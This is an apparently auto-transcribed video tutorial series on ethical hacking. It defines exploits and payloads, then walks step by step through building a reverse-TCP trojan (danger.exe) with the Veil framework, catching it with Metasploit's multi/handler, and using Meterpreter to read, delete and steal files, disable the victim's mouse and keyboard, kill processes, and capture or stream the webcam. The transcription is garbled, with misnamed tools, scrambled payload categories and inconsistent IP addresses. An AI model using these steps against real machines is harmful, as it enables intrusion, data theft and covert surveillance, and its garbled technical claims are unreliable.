to the organization. Prior to the organization, and make use of these exploits to gain the access. And make use of these exploits to gain access. So those are called as unknown exploits. So these are not identified by the organization, right? So if these are identified by the organization, automatically some patches will be developed to cover the vulnerabilities. Automatically those are known as known exploits. But these are the exploits identified by the hacker. So prior to the organization, that means before the organization finds these exploits, the hacker will identify the exploits and they'll make use of these exploits to gain the access. And these are also known as zero-day exploits. Zero-day exploits. So unidentified exploits. Okay, these are the unidentified exploits. So you can write it here. Unidentified by the company. Okay, with respect to the company. Right? So these are the known exploits and unknown exploits. Right? So hope you understood this one. So, and two more types of exploits. One is remote exploit. So these remote exploits, so hacker gain the access of a system or a network, or of a system or a network remotely. So that type of exploit is called a remote exploit. Okay, the exploitation will be done remotely, right? So exploitation, the process of taking an advantage of vulnerability. And the next one is local exploit. So the quite opposite. The hacker gain the access physically of a system or a network. So these we call it as a local exploits. So remote exploits and local exploits, right? So these are the different types of exploits. So hope you understood this one. So once again I am recalling the definitions. So exploit is a taking an advantage of vulnerabilities available in the system, network, software or hardware. And exploit is not a malicious, it is a piece of code which will take an advantage. Okay, and it will be used by the hackers to send the malicious code to the target system, victim system. So in today's session, we'll discuss about one more topic in ethical hacking, that is a payload. So in our previous session, we have discussed about the exploit. So exploit means the process of taking an advantage of any vulnerability of a system or a software or a hardware or a network. And once that exploitation was done, then we have to set this payload. So the payload is a data which is transmitted to the victim system, and this is also a software, this is also a piece of code, right? So which takes an advantage or which gain the access of the information from the target system, right? So this payload is a piece of data or a chunk of data which gives the access to hacker, right? So once the exploitation done, then this payload will be executed. So payload executes once exploitation done. So we can say this payload as a malware, right? We can say this payload as a malware, but exploit is not a malware. So this payload is a data transmitted. So the hacker will transmit some malware into the system, and
the control will be taken by the hacker. What should be happened on the target system, right? So that will be done with the help of this payload. So what to be done on victim system is decided by the payload, and the control will be from the hacker itself. And this payload, so for every exploit there will be a number of payloads, right? So a number of payloads are available. So where we can get these payloads? So these payloads, we can get these payloads by using from the popular tools called Metasploit framework, and wheel framework. So by using these two frameworks, we can use the payloads which are already available, and also we can create a payloads, right? So payloads are available at Metasploit framework or the wheel framework. So already in our previous sessions we have explained you about the installation of wheel framework, right? And coming to the Metasploit framework, this will be already pre-installed with the Kali Linux installation. So during the Kali Linux installations, already the Metasploit framework will be pre-installed. So that will be already available in your Kali Linux, right? So you can use the Metasploit framework or the wheel framework to use the payloads. So it will be having the exploits as well as the payloads, right? So in order to gain the access of a system, the first step is we have to find the vulnerabilities, and we have to take an advantage of those vulnerabilities by executing the exploit. And once it was done, then we have to set this payload. So the payload gives the access to the data to the hacker. Okay, gives the access of data to the hacker, and this will be executed only after the exploitation. And so actually this payload tells what to be done on the victim system, right? Now these payloads are classified into three categories. The first one is stage, stagger, stag. So these are the three classifications of payloads. Classification of payloads. So stage, stager, and stag. See what is this stage? Coming to the first one, stage, and this is designed for small communication. Small communication. That means just like creating a user. So by using this stage payload, we can create the user. A small kind of communication. It will establish a small kind of communication. And coming to the second category, stagger module. And here, this payload is designed to upload bigger size of files to victim system. So in order to upload, so once the exploit was done, once the payload is set, automatically the complete access of that victim system will be under control of a hacker. So hacker can automatically upload some files to the victim system. So the second stage, the second type of payload is a stager or a stagger, and this is used to design, this is designed to upload the larger size of files to the victim system. And coming to the third category, that is a stag. These are the stag. And these are the payload components these are the payload components which are downloaded from this particular second type. Okay, and it provides some advanced features like no limit on the size of the file which are being uploaded in the victim system. So there is no size limit, right? See, this payload, these are the payload components. Payload components downloaded. These are the payload components downloaded from Stagger modules. The second type, okay, Stagger module, and provide some advanced features. Advanced feature like unlimited size of files to be uploaded. Right? So these are the different types of payload. So one example for this payload is, so example, I will tell you the example. See, the common example which we will use is reverse_HTTPS or reverse_TCP. So these two are the different payloads which gives the reverse connection between the victim system and the attacker or hacker, right? So in order to gain the access of a data of a victim system, we need a connection. There should be a connection between the victim system as well as the attacker, right? So that connection, that reverse connection will be established by executing these payloads. That means a reverse HTTPS or reverse TCP. So this is a simple example of this payload, right? So once the vulnerability is found, automatically the exploit will be done and immediately the payload can be set. That means we can gain the access of computer. So payload will be a malware. So it can send the data what to be done on the victim system, right? So a malware can be sent to the victim system so that it will be get executed, right? For example, if the attacker sends a mail with a small attachment, so if the victim system, the victim or the person who downloads that attachment from the mail, and immediately it replicates itself and creates some ransomware malware, then that type of ransomware is known as a payload. So what actually done on the victim system is given in the payload, the piece of code given in the payload, right? So hope you understood this payload. So I will show you the Metasploit framework and the wheel framework, and I will show you the payloads in those frameworks in the Kali Linux. So already we have installed the Kali Linux in our virtual machine, and now I will show you how to get the payloads from Metasploit framework as well as the wheel framework. So the installation of wheel framework is already explained, and it is available in our playlist. I will post the playlist link in the description box. So just click on that one and follow the installation process and do the installation, right? So let's stop here. Let's move on to the Kali Linux and let us explore the payloads.
So hello friends, so just now we have seen the importance of a payload, what is a payload and what are the different types of payloads, and there will be already available payloads, and we can also create a payloads, and these payloads will be available in two different frameworks. So as we have discussed just now, that is a Metasploit framework and the wheel framework. So now we'll see what are the different where we can find these payloads. So the first one, wheel framework, already we have installed this wheel framework. Just go to the terminal and type the command wheel so that it will open the wheel framework, and here you can observe the two tools. There is a evasion tool and ordnance tool. So in both the tools we can have the payloads. Just use one, the command use one to use the evasion tool, and use two to use the ordinance tool. I'll go with the use one evasion. So you can find out here wheel evasion menu. So in that you can find 41 payloads are loaded. So just to list out the payloads, you can simply use a list command. So it will list all the 41 payloads here. And you can see there are different payloads. And one example we have seen in our class, that is reverse underscore HTTP and reverse underscore TCP, which gives the reverse connection between the attacker system and the victim system. So you can observe a lot of payloads are available. So here we are having HTTP and TCP, and again we are having some HTTP, HTTPS and TCP, and here also we are having some HTTP, HTTPS. So what's the difference? So the first part of this payload is a language in which the payload has been created. So this is a auto IT, this is an auxiliary, this is a C, and this is a CS, this is a Go language, Perl language, PowerShell, Python, Ruby, etc., etc. So you can use anything. So you can use a Python or you can use Ruby, whatever it may be. So, but the working of this payload is same. It establishes the reverse connection if you are using some reverse underscore HTTP or reverse underscore TCP, right? So this is how we can list out all the payloads which are available in the wheel framework. So you can use either evasion tool or ordinance tool. And coming to the Metasploit, so as I have said that the Metasploit framework will be pre-installed with the Kali Linux. Already that will be installed here. So in order to open that one, just use a command called msf console. That means MSF. MSF stands for Metasploit framework. So just click on enter. Just wait for a few seconds. So it may take some time. So meanwhile, subscribe to our channel and support our channel. So here you can find the message starting the Metasploit framework console. So here you can see it was open, and here you can observe the menu. So 2230 exploits are there and 867 payloads are there. Okay, so in order to list out, so just use a command called a show payloads. So it will show all the payloads which are available. See, all these are all the payloads, right? So here also you can see the payload followed by the Windows and the PowerShell, the language followed by the reverse TCP, reverse HTTP, everything is common. So the format is different, but these are all the payloads which are available in the MSF console. We can make use of any one of the payload regarding to our requirement. Okay, and also there are a lot of exploits here. So we need to exploit the vulnerability, then only we have to use a payload. So we can go with one. So show exploits. So it will show all the exploits here. So 2229 exploits. So we can use the exploit and then we have to execute the payload so that we can take an access of a victim system. So this is how we how the exploit and how the payloads can be selected from the Metasploit framework or the wheel framework. Right.
In today's session, I'll show you the installation of wheel framework in Kali Linux. And the importance of this wheel framework is used to create a payload in order to execute the exploits in the target machine. So we'll see how we can install this wheel framework in the Kali Linux. So already in the previous session, I have explained you the installation about the Kali Linux in the virtual workstation. So I'll open that VMware. So in that VMware, we are having two operating systems, Kali and Windows. So I'm opening this Kali Linux. So in this Kali Linux, we are supposed to install the wheel framework. So let us wait. So it will prompt for the user ID and password. So give the user ID and password which you have given during the installation, and you'll get the terminal. If you're not getting the terminal, no problem, just open the terminal here. So from the terminal you are supposed to install the wheel framework, and the syntax for installing any package or module in Kali Linux is sudo apt install wheel, and it will prompt for the password. So again you just give the password. It doesn't display the password on the screen, but just give the password and press enter. So automatically it will start installing the wheel framework, and make sure that your system is connected with a proper internet, right? So you'll get this option, do you want to continue? Yes, type Y and go with the enter. So it will start executing or installing the wheel framework. So during this installation it will also install some Python packages, right? Some wine package, etc, etc. So you'll be look after that one. So you can see again we have got this prompt. So still we need to execute more number of installations. I mean more packages should be installed. So just after that you just give the type wheel and press enter. So automatically you'll get this one. So continue with the installation. So type yes Y and press enter. So it will start cloning, and it will start installing the wheel framework. Whatever the packages it requires, it will extract from the internet and it will execute this one. And make sure, once again, make sure the internet is connected. Your system is connected with the proper internet. So you can observe here, it will also prompt to install Python. So just go with this one. So Python 3.4. So click on next, and it will start installing the Python. So you can observe installing the collected packages, setup tools, pip, etc, etc. So this installation of Python has been completed. So click on finish. So again it's going to install a Pywin module. So install this one. all are the related modules to the wheel framework. So this is also completed. So click on finish. Again, another module PyCrypto. So go with the next. So it was also completed, finish. So again, so it was trying to install the Ruby script. So click on the next, and this is also related to the wheel framework. So everything will comes with the wheel framework. So click on finish. One more module, auto LT. So click on the next and install, and the installation process is being progressed. So you can see it was completed, and it will prompt for the Kali password. So again, just type the password. So it will not be display on the screen, but just type it and press enter. So you got some error, so need not worry about this one. See here it was displayed that can't find the wine profile for auto IT version 3, and you can run this command in order to install that one. So directly just copy this one. So the copy this complete command. So right click on this one, select copy selection, right click, and here simply right click and a paste selection, and simply press enter. So automatically it will again start installing the wine configuration, the wine module. So you can see here the wine configuration is in particular location is being updated. So again it will prompt for the password. So just give the password, press enter. So done. Okay, so you can check whether the wheel framework has been installed or not. So just type the word wheel and press enter. So you'll get the wheel prompt. You can observe here, if you get the wheel prompt, automatically that says that wheel installation has been completed. So you can see the main menu with the two tools loaded. So the two available tools are evasion and ordnance, and different commands available for this wheel framework. So you can use these tools and the commands in order to create a payload to run the exploit on the target machine. So in our previous session, we have discussed about how to gain the access of a target system. And once you gain the access, automatically you'll be having this Metasploit shell, right? So if you didn't follow that one, I'll post the link in the description. Just go through that one. How can we gain the access? And once you gain the access, you'll be getting this Metasploit shell, and from here you can access the data from the victim system. So here in this Metasploit shell, so will be having a lot of commands. In our previous session, we have seen two commands like a shutdown and a screenshot. So if you use a screenshot, the complete screenshot of the victim system will be saved. And if you are using some shutdown option, so that will shut down the victim system. Now we'll see a few more commands, the important commands of this Metasploit shell, right? So before starting the session, I just want to say one thing. So this is only for the education purpose. Please don't try it on your personal revenge, right? Yes. See, a few commands. These commands are core commands, file system commands, networking commands, system commands, and user interface commands. And all these commands will be used to gain the access or gain the data of a victim system. And now this VMware will be the attacker system and the desktop is a victim system. So now we are going to access the data of this particular desktop, that means the victim system, by using the commands on the attacker system. So in the attacker system, the Kali Linux is there. Okay, so coming to this core commands, the exit and quit. So these two commands will terminate the Metasploit session. So if you use this exit here, automatically it will terminate the Metasploit session. So once we complete all the commands, then we'll see the exit and quit. Okay, so once it was quit, automatically we have to do the complete process to gain the access once again, right? So we'll see these exit and quit in the last option, right? So if you use a help, so it will give the complete help. So whatever the commands we can use, everything, right? So everything will be given here, right? See, a file system commands and networking commands. So system commands, user interface commands, webcam commands. We can also access the webcam, right? So like that we'll be having a lot of commands here. So the complete information will be available in the help command. So just if you type help, you will get the complete details. And coming to the IRB is just, it will enable the Ruby scripting mode. So if you want to write any Ruby script, then you can go with the IRB so that it will start the Ruby script. So here you can write the Ruby script, right? So if you want to come out from the Ruby script, just give the exit option. So again, you will get into the Metasploit shell. And the next one, file commands. Coming to this file commands, the first one is a cat command. So cat command, we all know about this cat command. We have seen this cat command in the Linux environment. So that is used to read and output to standard output the contents of a file. So before going to that, we'll see a few commands like a get LWD. That means it will give the local directory. See, get LWD. So once again, I'm saying we are now in the Metasploit shell. That means we have an access to the victim system. See, local working directory. That means within this VMware attacker system, we are in home and Kali. And if you go with the get WD, that means a working directory. So this is a local working directory, and get WD working directory, you can see users, some username, OneDrive and desktop. This is nothing but our victim system. Now we are working in this particular path. Okay, get LWD means local working directory. In the attacker system, we are in home and Kali, and in the victim system, get working directory. This is the victim system information. This both, right? Now see, PWD.
PWD means present working directory. So where we are, PWD, it will display the present working directory. So we are already in this particular thing, so we'll be here. Okay, now we are in this particular thing, and see, in the desktop you can find the command called, folder called hello. So here you will see change the directory to hello. So we have seen these commands in the Linux itself, right? So cd is to change the directory, mkdir is to make the directory, rm is to delete a file, rmdir is to remove the directory, right? So now the present working directory is desktop, that means a victim system. So whatever the thing we are writing here, that will be affected on the victim system. So on the victim system, the desktop, we are having the hello folder. So I'm changing the folder to hello. So cd hello. Now you can observe pwd, present working directory, it is an hello. So you can use a ls command to list all the files and directories. Okay, so in the hello we are having few things. So I will open this one. So we are having only one file, that is sundeep.txt. You can observe here the name is sundeep.txt is available here. And in order to know the content of this sundeep.txt, we can use the command, the first command, that is a cat. Read and output to the standard output the contents of a file. So reads the output from the given file name, and it will display the output on the standard output, that means on the screen, right? So you can use a cat file name .txt. So you can observe the welcome to Metasploit Commands. That's the information available in the sundeep.txt. Let's cross check it. Let us cross check. See, in the desktop, go to the hello folder. So here sundeep.txt. So here we are having the content, welcome to Metasploit Commands. That means we are accessing the file which is available in the victim system, right? Yes. Next, delete the file on the victim system. So we can delete a file in the victim system. So you can delete here, see del, and now just check where we are now. So present working directory, we are in hello. So del, I'll delete sundeep.txt. So automatically the file has been deleted in the hello folder, right, which is available on the desktop. Let's cross check. So hello folder. So just refresh this one. So you can observe the file has been deleted. Okay, the file has been deleted because we have applied here. So we are not deleting the file in the desktop. We are working in the virtual environment, that is also in the Kali Linux, and we are controlling all the things which are available on our desktop, right? So that's a delete. And also we can download a file from victim system to the attacker system. See, for example, go to the hello and let us create one more text file. Yes, text file. So I'll create some Sundeep. So in that we'll write yes, welcome to ethical hacking sessions, right? So I have written something, so which is available in hello. Now I just want to download that sundeep.txt to the folder Kali. So here I'll go with the Kali. See, I'll go with the Kali folder, open the folder and Kali folder. Here we'll get this one. So you can observe here there is no file in this particular thing. So this is a attacker system, right? So here we are not having any file. Okay. Now let us check. See, sundeep.txt, here we are not having any sundeep.txt. Now download sundeep.txt. So because already we are in hello folder, see hello folder. If you find the list of files, we are having sundeep.txt. Simply you can download it. So download sundeep.txt, right, to home and Kali, and I'll go with the desktop. See, I am just downloading the sandeep.txt to home, Kali and desktop. So in our desktop, that will be available. You can get here. See, Kali, and in the desktop you will be having this sandeep.txt. So hope you understood. So if you want to place that sandeep.txt here, just go to the console, go to this one. So use this one and remove this one. Give the path where exactly the file should be copied. Okay, execute automatically. Now in the Kali folder you will be having the sandeep.txt, and open this one. So welcome to ethical hacking sessions. So which is available here also. Welcome to ethical hacking sessions. Right. So this is how we can download the files from a victim system to our attacker system. And also you can use the edit. So once you are having a control on the victim system, you can execute anything, you can add files, you can remove the files, you can modify the files, everything can be done. Right. So similarly, edit command is used to edit the file. So once again, let us check pwd. So where we are working. So our present working directory is in hello. So we are having one file sandeep.txt. Just go with the edit sandeep.txt. So automatically you can get this one. So edit, and here there's a VA editor. You know the VA editor. So we have already recorded this session in Linux and Unix environment. So I'll also post the link of Linux and Unix playlist in the description. So go through that one. So what are the commands we have to use to execute or work with the VA editor, right? So just I'll add a few more lines. So welcome. Sorry, yeah. Today's session is on Metasploit Commands. So I just want to exit. So from this file, so give the escape so that the mode will be changed to the command mode. So colon WQ, that means save and quit. So already saved and quit. Now you observe the same file in the desktop. See, so you'll be having the same thing. That means we are editing the file which is available in our victim system. Okay, so edit can be done, and we have seen this get LWD and get WD ls, and also we can make the directory. So making the directory is just creating a directory. So I'll create again, check present working directory which is in hello. So mkdir. So I'll go with a Saradhi. So one directory will be created in hello folder. Now you can observe in the hello folder, just a refresh. So one folder is created, Saradhi, because here we have done. So in the attacker system we are doing, that was reflecting on the victim system, right? Then pwd present working directory, rm which deletes a file, rmdir which deletes the folder. Now observe, already in hello there is a Saradhi folder, it's a directory. So rmdir Saradhi. So removing directory Saradhi. You can observe here already the directory has been removed here, right? So and upload, we can also upload a document from our attacker system to the victim system, right? See, in our let us check in this particular thing. Let us create this JPEG screen.jpeg. We can upload this screen.jpeg onto the desktop, right? So let us check. What is a local working directory? Get LWD, which is the local working directory. Now we are in the home and Kali. So upload screen.jpeg. So to the path where we are working now. So just go to the path here. See, this is a path. So go to the path, properties, and just copy this path. And to this path, the file should be copied, right? So save this path. Okay, oh sorry, you have to give the name here because the present working directory. So get local working directory is home and Kali, and present working directory is hello. So you can simply upload the things. Upload screen dot jpeg to jpeg to image dot jpeg. Execute. Oh sorry, I think error command upload error number, no such file or directory. Okay, so we'll see. So here screen, yes, the name was different. Okay, it was not spelled properly. Yes, now you can check screen.jpeg. Yeah, so use the same command, and here use the same command. Yes, you can observe it was copied, and now in the hello, just refresh the page, you'll be getting the image.jpeg. So this is the image.jpeg, right? So we can upload the files or we can download the files. We can upload the files from attacker system to a victim system, and similarly we can download the files from victim system to the attacker system, right? And these are the few file system commands. And then coming to the networking commands. So in this networking commands, one command is ipconfig, which will give the complete network interfaces like IP addresses, etc., etc. So you can observe here ipconfig. So this is a IP information, ipconfig, which gives the IP address information, and also the root, which will view or modify the victim routing table. So this is a routing table, source from source to destination, subnet mask, okay, and a gateway, so through which the packets will be transferred. Everything will be done here, right? And sorry, and there are a few system commands. So here you can use a shell. One is a shell. So you will get the command prompt here. See the command prompt. If you observe here, just sorry. And see in the desktop, if you go with a cmd, you'll be having the same thing. The same command prompt was here now, right? Because we are now in the present working directory, so that will be opened here, right? If you want to exit from this command prompt, just go with the exit command. So sorry, yes, so shutdown, this already we have done in the previous session. So it will shut down the system. And finally sorry, another one is a sysinfo. It will give the complete system information, the name of the computer, the operating system which we are working, and everything will be given here, the system information. And also we can use the reboot command, and this reboot command will restart the victim computer. Okay, it will restart the victim computer. So similar to our shutdown, right? And the next one is a PS, which gives the running processes. What are the available processes which are in the victim system, right? So PS. So you can see these are all the processes which are in the victim system. Example, see, I'll tell you that one. So get PID. So we can get the process ID. Okay, we can get the process ID. Get PID, which gives the process ID, the current process ID, this one. And if you know the process ID, we can kill the process. We can terminate the process, right? For example, in the victim system, I'm just opening the Paint application. I'm opening the Paint application. So this is one process which is running in our victim system, right? Now I will use a PS, which will give the complete processes which are running in the victim system. See, you can observe here mspaint.exe, which is running at present. So we need to know the process ID. If you know the process ID, we can kill the process ID from the attacker system. So the first two columns gives the process ID. So we'll check which one give the process ID. Yes. So this is the process ID, PID. This is a process ID. The first column is a process ID. Now we'll check what is the process ID of MS Paint 17928. And observe, So this is a paint application, so which is having the process 17928, and here you can see kill. Kill means we can kill the process. So kill the process ID 17928. So obviously the MS Paint has been closed, because if you know the process ID, we can kill the process from the attacker system, right? So once again, so I'm opening the MS Paint, and every time the process ID can maybe change it. Again, go and check for the process ID for MS Paint. 17784 is the process ID now. So just use a kill 17784, I think. Okay, once again we'll check 17784. Yes. So you can observe the paint is opened here. Paint application is opened here. I'm just using the kill the process ID. Automatically the paint application has been closed. Right. So that is the kill. In order to get the current process ID, we can get by using the get PID, and kill is to kill the process. If you know the process ID, we can kill the process. And reboot, automatically the system will be rebooted, and shutdown we have seen. And the next is screenshot. Yes, so here as usual in the previous session we have seen the screenshot. It will take the screenshot of the desktop and it will be saved in the home Kali, and you can observe here in the home and Kali. Yes, so this is a screenshot we have done just right now. Okay, so this is a screenshot just right now we have done, right? So, and again the last one, UICTL, that means a user interface control. So we can control the mouse and a keyboard in the victim system. You can observe here. So I am using the mouse. Okay, I am using the mouse. Everything I am doing, right? It is working now. Now see, UICTL disable mouse. So this will disable the mouse in the victim system, and this is the attacker system. We can get we can use the mouse, but in the victim system, so if you are trying to click on the mouse also, it will not be working because we have disabled the mouse on the victim system. So the mouse will not be worked in the victim system. And similarly, you can also disable the keyboard. So now I'm not doing that one, because if you disable the keyboard, again we can't, the same way we can use the keyboard also, right? So even though I am typing the keyboard, the keys will not be, the data will not be presented in the Excel, right? So if you want to again enable the mouse, use the same command UICTL enable mouse. That will enable. So here just the mouse was moving on, but it doesn't works in the victim system because we have disabled the mouse. And UICTL enable mouse. So it was enabling mouse. Now the mouse is moving, and also the working, it's also working, right? And once again, if you use a UICTL disable keyboard, disabling the keyboard has been disabled. So it was selected, but I'm just trying to type some data using the keyboard. It was not printing, right? Because the keyboard has been disabled. Again, go to the attacker system. Here the keyboard will be enabled, right? So again, use the same thing, UICTL user interface control enable keyboard, which will enable the keyboard, right? And now you can type the data. The keyboard will be enabled, right? So these are the few important commands that can be used to gain the access or to access the data on the victim system. Okay, so once again I'm repeating, so this is only for the educational purpose. So that's why I am just taking the access of my desktop from the VMware. So don't try on your personal revenge, right? So I think we have covered all the commands, and now we'll see the reboot option. Okay, I will go with the reboot option. So immediately the system will be rebooted, and I'll be back within a second, right? So reboot. Yes, friends, just now the system has been rebooted, and hope you understood the commands, the important commands of a Meterpreter shell. Okay, so this is a Meterpreter shell commands. So in today's session, we'll discuss about a few commands of Meterpreter shell, that is a webcam commands. So actually in our previous session, we have seen various commands that can be used on a Meterpreter shell, but actually we missed these webcam commands, so which will take the access of a webcam of the particular device, right? So we'll generate a payload and we'll take the access of a system or a device, then we'll use the webcam commands on the Meterpreter shell. So see, go to the command prompt and use a wheel framework to create a payload. So I'll use a 1, that is a evasion tool. I'll use a 7 payload, which is nothing but our reverse TCP. So use 7 reverse TCP, and we need to set the lhost address. Lhost address is the IP address of the attacker system. So our system, I'm giving my system as an attacker system. So our system will be acting as an attacker and the victim also, right? I'm not hacking any other systems, right? So lhost 192.168, right? So now I'm getting the access. Now generate the payload. So I'll use a name as a danger, so we can get the access of this one. So this is a path where it was created. So go to the folder and yes, meanwhile go to the command prompt, and again we have to start the MSF console to exploit the payload. So here I'll delete all these images. Yes, now I'll give the folder here. So here I got the payload which was generated just now. I'm copying that onto the desktop, and now go to the MSF console. So once it was opened, we can start exploiting that one. So once you exploit the payload, automatically we'll get the Meterpreter shell, and there we can execute the commands. So there are a few commands of webcam list, webcam snap, and webcam stream. So yes, starting the Metasploit framework console. Now we got a Metasploit framework console here. So use the exploit multi-handler. Use exploit multi-handler to gain the access of the system. Multi-handler, and set the payload reverse TCP. Set a payload Windows Meterpreter reverse underscore TCP, and set the lhost 92.168.71.128 and exploit, and you can see we got the Meterpreter shell, right? Now you can use a command called webcam underscore list, which will display all the cams available on your device. So now I am using this I mean at the victim system, I'm gaining the laptop. So this laptop is having only one camera, HP wide vision HD camera. So if you are gaining the access of any Android mobile, so you'll get the two cameras, that means a front camera and a back camera, right? Rear camera. So like that, it will display all the cameras which are available in the particular device, right? So webcam underscore list. Next, webcam underscore snap, which will take the screenshot, not the screenshot, the snap, okay, of a from the webcam, okay, from the webcam, snap from the webcam. Now you can observe here webcam underscore snap. So see, starting got frame, the webcam shot saved to so and so. You can observe it will open. So this is my screenshot, right? So now I'm executing this one. So through my webcam, a snap has been clicked, right? And you can observe it was saved in this particular location, and you can also check in this location. So go to the folder, open the folder, and you can check here. See here, this is a webcam snap. snap which was taken from the webcam. And similarly, there is a one more command. There is a one more command here. So that is a webcam underscore stream. So it will start streaming the webcam. You can observe starting, preparing player, opening player. See, you can observe here. Yes. So this is a streaming. So this is a video coming from my webcam itself, right? Okay, the status playing, target IP, and the start time. You can observe everything. Okay, so this is how we can access the webcam of any device. Right? So hope you understood this webcam commands, webcam snap, webcam stream, and webcam list. So these are the few commands which will gain the access of a webcam of the particular device. So in today's session, we'll discuss about one more concept in ethical hacking. That is, how can we find the vulnerabilities and how can we exploit the payload and how can we gain the access of a target system. So before starting the session, so just remember one thing. So this video is only for the education purpose, and please don't try it for your personal revenges, right? So the topic today we are going to discuss is getting access of target system. So for this one, first we need to find the vulnerabilities and we have to make use of that vulnerability, right? That we call it as an exploit, right? So here the step one is we are going to create a payload. So create payload. So using wheel framework. So already we have recorded a session how to install this wheel framework. So just go through that one. So the complete playlist of this ethical hacking will be posted in the description section so that you can just refer this one, right? So once the wheel framework has been installed, so just create a payload by using the wheel framework and open the wheel framework, and then here, so copy the file to the target system, right? So first, after creating a payload using the wheel framework, and here also in the wheel we are going to select the reverse TCP, and with the help of that reverse TCP we are going to create this payload and then copy the file to the target system. So a payload will be created, so copy that payload file to the target system. And step 3, now we have to start gaining the access. So how we can start it, right? So what is the step 4? Open the MSF console, that is Metasploit console, right? So this Metasploit console is used to find the exploits and run the payloads for the particular exploits. So here the exploit is just using the multi-handler exploit. So we are going to use the multi-handler exploit to gain the access of a system, right? So step 5, after opening the MSF console, use multi-handler exploit. And after using that one, so just set the payload as a reverse TCP payload. Okay, use payload reverse underscore TCP. Okay, so we have to set this payload, not use, we have to set this payload using Meterpreter shell. So what is this Meterpreter shell? So this Meterpreter shell is a command line interface through which we can gain the access of a target system. So we can access all the informations through this Meterpreter shell. So once the exploit has been executed, automatically this Meterpreter shell will be appeared. So once the Meterpreter shell is okay, then we can access the target system, right? So set the payload and simply exploit. So Metasploit shell will be opened. So obviously you can gain the access of a system, right? So once again I'm repeating, so don't use this process for your personal revenges. So this is only for the educational purpose. So first let us open the Kali Linux. So once it was opened, what's the first step? We need to create a payload using the wheel framework. So already we have installed this wheel in our system. So I'll open the wheel framework. So go to the command prompt. There's a terminal. Go to the terminal. So just go to the root. So in order to switch to the root, sudo su, type sudo su. It will prompt for the password. Just give the password. So you can observe here root@Kali. Right. Now open the wheel framework. So just type wheel and press enter. The wheel framework will be opened, and you can use, that means there are two tools, evasion and ordnance, to create a payload. So we can choose any one. So I'm choosing evasion. So in order to choose evasion, use a command called use1. So use1 will choose the evasion tool in order to create the payload. Yes. And here you can observe wheel evasion menu. There are 41 payloads available here. Okay, 41 payloads. So among these 41 payloads, the number 7 payload is a reverse TCP. Okay, reverse TCP, which will establish the connection between the target system and the attacker system. So I'll use the 7, right, which is a reverse TCP payload. So use 7. You can observe here Metasploit shell reverse TCP, and we need to set the attacker system IP address, okay, from which you are attacking, you are gaining the access. So that we will represent with the help of lhost. So there will be two terms called lhost, so which is the address or identity of host system, and rhost, so which gives the identity of victim system. So here we need to give the lhost, right? I'm not having any rhost, so directly I'm giving the just host system, right? So I'm just giving set lhost. So I need to give the IP address of this particular system, right? So in order to get the IP address, just go to the one more terminal and type the command ifconfig, which will give the IP address. So here you can have the IP address 192.168.1.28. So go to there, set lhost 192.168.71.128. So automatically it has set, and now we need to generate a payload, right? So actually if you use this one, see, so here we have given use 7, right? Use 7. So use 7 means, you can observe here reverse TCP has been selected, and here you can observe L port is, there is a port number through which it can be executed, and lhost, this is a value which is not available here. So that's why we are giving the lhost value, right? We are giving the lhost value, IP of Metasploit handler. So from where we are going to access, right? So that means the attacker system, the address of an attacker system. So that we have to set here. And once it was done, now use a command called generate in order to generate the payload. So execute. So you can observe here. So please enter the base name for output file. So default is a payload. By default it will be a payload. So we can give the name. So I'll give the name as, yes, danger, right? Danger. So executed. See, the language used to create this payload is a C language, payload module. So payload module, so it is a reverse TCP. Executable return, that means a exe file. .exe file is danger.exe, and the code, whatever the code is written. So by using this danger.exe, we are gaining the access of a target system, right? So just copy the path and copy the file. The next step means, see here you can see, once the payload has been created, copy the file into the target system. So just go to the folder, open the folder and give the path. So here you can find the exe file danger.exe. So just open, just copy this one, paste. So here you can observe on my desktop there is a file called danger.exe. This is a payload. This is a payload. So after that one, you can start gaining the access by executing that particular danger.exe file. So what we have to do in order to gain the access, we have to open the MSF console and we have to execute the payload. So just go to the Kali, close this one. So open one more terminal, so this we can make use of this terminal. So just open the MSF console. MSF console means Metasploit framework console, where we can find the vulnerabilities, exploit the vulnerabilities and execute the payload, right? So just give the MSF console, which will be inbuilt in a Kali Linux. So just type the MSF console and press enter. Automatically it will start loading the MSF console. So once it was done, we have to use the exploit, and by using that exploit we have to run the payload. Okay, so in our previous sessions we have seen what is an exploit and what is a payload, right? So the sessions will be, the links will be available in our description box. So just go through that one, what is an exploit and what is a payload. So by using the exploit, we have to execute the payload. So that means first we have to select the exploit and then we have to run the payload. So you can observe here starting the Metasploit framework console. So yes, we got the prompt MSF6. So the first thing, so here you can find 2,230 exploits are there and 867 payloads are there, right? So first we need to use the exploit, right? So use exploit. So what is the exploit to gain the access? That's a multi-handler exploit. Use the exploit multi-handler, and we need to set the payload. Okay, reverse TCP payload. By using the reverse TCP, we are executing the payloads. So set payload. So in Windows, it's a Metasploit shell. We are using the Metasploit shell. Metasploit reverse TCP. Reverse_TCP. So the payload has been set to reverse TCP. That means a reverse connection between target and victim. Now you have to set the lhost. Okay, set lhost, so which is attacker address, so 192.168.71.128, and now we have to exploit the payload, right? So just use the exploit. You can observe started reverse TCP handler on so and so with a port number so and so. So in our previous sessions we have seen what is a port number, right? Through port number the data communications will be, the data will be communicated, right? So the data can be entered into our system through the port numbers. These are logical ports, right? And this is the IP address. And started reverse TCP handler, that means a connection has been established between the target system and the attacker system. So when this will be initiated? So once you copies this one on the target system, so this is a payload, right? So this was copied in the target system. So once in the target system, if this file has been double clicked, automatically the access will be gained by the attacker. So just imagine the desktop is the victim system, because so our system itself, I'm treating it as a victim and the target. So my VMware, the Kali Linux is a attacker system, and the desktop which you are visible is a victim system. Okay, this is only for the educational purpose. right? I am not doing this one on another machines. Okay, I am doing myself just for educating yourself. Okay, so for better understanding, I have split it the desktop. I mean, I have minimized this VMware. So whatever the VMware is an attacker system, and the desktop is victim system. So just I am double clicking this danger.exe. So once you double click this danger.exe, automatically here the connection will be established. So just a second, it may take some time. Yes, so you can observe here sending stage. So you got the Metasploit shell. Okay, you got this Metasploit shell. So here you can use a different commands. Now the attacker system, I mean the victim system access is on your attacker system. So sometimes don't worry, sometimes the section will be closed. So once again you just gain the access by copying the file. So where it was, just a second. So in this, I think the file is available here, compiled. Yes, so here danger. So I'll copy this once again, replace the file. Yes, so once again we'll exploit this one, so that see, exploit. Right now start at reverse TCP. Once you double click this file, you will be getting the access. If you get this Metasploit shell, that implies that you have gained the access. The attacker gains the access of the victim system. So here you can use a command of, once again the session has been closed. So once again we'll execute. Let me demonstrate you. So there will be a lot of commands available in the Metasploit shell, so which we'll discuss in our further sessions. So by using those commands, we can gain the access of the target system, victim system, right? See, just a second. So exploit. 